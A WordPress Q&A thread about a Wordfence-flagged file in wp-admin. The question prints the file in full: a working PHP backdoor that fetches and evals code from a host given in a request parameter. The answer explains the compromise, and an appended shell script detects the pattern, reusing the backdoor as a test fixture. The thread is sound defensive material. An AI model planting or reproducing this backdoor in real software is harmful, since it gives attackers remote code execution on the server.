Tags: wordpress, wordfence

Wordpress warning - Backdoor:PHP/numeric.rce.8527


I have been looking at the Wordfence scan results on my site this morning and see 17 instances which seem to imply malware has been installed on the server. I would be surprised if this were to be the case but wanted to be sure:

One example,

Filename: wp-admin/menu-header-cron.php File Type: Not a core, theme, or plugin file from wordpress.org. Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x0aif (isset($_GET['limit'])) {\x0a eval(file_get_contents('http://' . $_GET['limit']));\x0a}

The issue type is: Backdoor:PHP/numeric.rce.8527 Description: Remote code execution malware

Looking at the file in question, the content of this file is:

<?php
// Backdoor: fetches PHP from a host named in the request and executes it
if (isset($_GET['limit'])) {
    eval(file_get_contents('http://' . $_GET['limit']));
}

Can anyone confirm whether this is an innocent file or something I need to quarantine/delete?

Also, how was this file created? It implies that remote code has the capability of creating new files in the wp-admin/ sub folder? Is there not a simple way to prevent this which would preclude any further instances?

Many thanks for any input


Solution

Answers:

1. Yes, this is a dangerous file as already mentioned by @Everlyn Woodley. eval() is not considered safe in production at all.

   Further to verify, a quick grep "isset($_GET['limit'])" on the source files of the latest Wordpress package tells that it's not part of it, hence again dangerous code.

2. Yes, someone is able to upload files on your server. Probably they have uploaded some kind of web-shell and can manipulate any file on your hosting account. It's pretty common though.

3. To prevent it in future (given that you have successfully cleaned your current WP install), you can do a few things (there are plenty of articles so it would be redundant), but mentioning a few might not hurt here:

   If you examine the access log of a regular WP install, you will notice that there are tons of bots hitting with known vulnerabilities, mostly targeting the plugins folder; simply changing the plugins folder location along with other security measures mentioned above can significantly reduce such hacks.
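The answer's two checks (grep for the flagged eval pattern, and confirm the file is not part of the WordPress package) as an added shell example, not code from the question or the answer. It assumes GNU or BSD grep with `--include` and a manifest file listing one relative core path per line, built with `find wp-admin -type f` in a freshly downloaded copy of the same WordPress release; the sample tree it scans is constructed in a temp dir.

```sh
#!/bin/sh
# Added example: scan a WordPress tree for the eval(file_get_contents(...))
# backdoor pattern Wordfence flagged, and list files under wp-admin/ that are
# absent from a manifest of a clean install of the same version.

# ERE for eval() fed by file_get_contents() on a URL built from request input.
BACKDOOR_RE='eval[[:space:]]*\([[:space:]]*file_get_contents[[:space:]]*\(.*\$_(GET|POST|REQUEST|COOKIE)'

# scan_backdoor_pattern DIR: prints each PHP file under DIR matching BACKDOOR_RE
scan_backdoor_pattern() {
    grep -rlE --include='*.php' "$BACKDOOR_RE" "$1" 2>/dev/null | sort
}

# scan_unknown_core_files DIR MANIFEST: prints files under DIR/wp-admin that are
# not listed in MANIFEST. The manifest must contain no blank lines, because an
# empty -F pattern would match every path.
scan_unknown_core_files() {
    ( cd "$1" && find wp-admin -type f ) | sort | grep -vxFf "$2"
}

# build_sample_tree: creates a constructed sample site in a temp dir for a dry
# run and prints its path. The placeholder core file is not real WordPress code.
build_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-admin" "$d/wp-content/uploads"
    printf '<?php\n// placeholder for a genuine core file\n' > "$d/wp-admin/menu-header.php"
    # Copy of the file quoted in the question, used only as a detection fixture
    cat > "$d/wp-admin/menu-header-cron.php" <<'EOF'
<?php
if (isset($_GET['limit'])) {
    eval(file_get_contents('http://' . $_GET['limit']));
}
EOF
    # Benign use of file_get_contents with no eval, to show it is not flagged
    printf '<?php\n$cfg = file_get_contents("/tmp/cfg.json");\n' > "$d/wp-content/uploads/helper.php"
    # Manifest of the clean install: only the placeholder core file is listed
    printf 'wp-admin/menu-header.php\n' > "$d/core-manifest.txt"
    echo "$d"
}

# Usage on a real site: scan_backdoor_pattern /var/www/html
#                       scan_unknown_core_files /var/www/html core-manifest.txt
```

The manifest check is a quick triage aid; for a full comparison against the official release, WP-CLI's `wp core verify-checksums` checks every core file against the published checksums for the installed version.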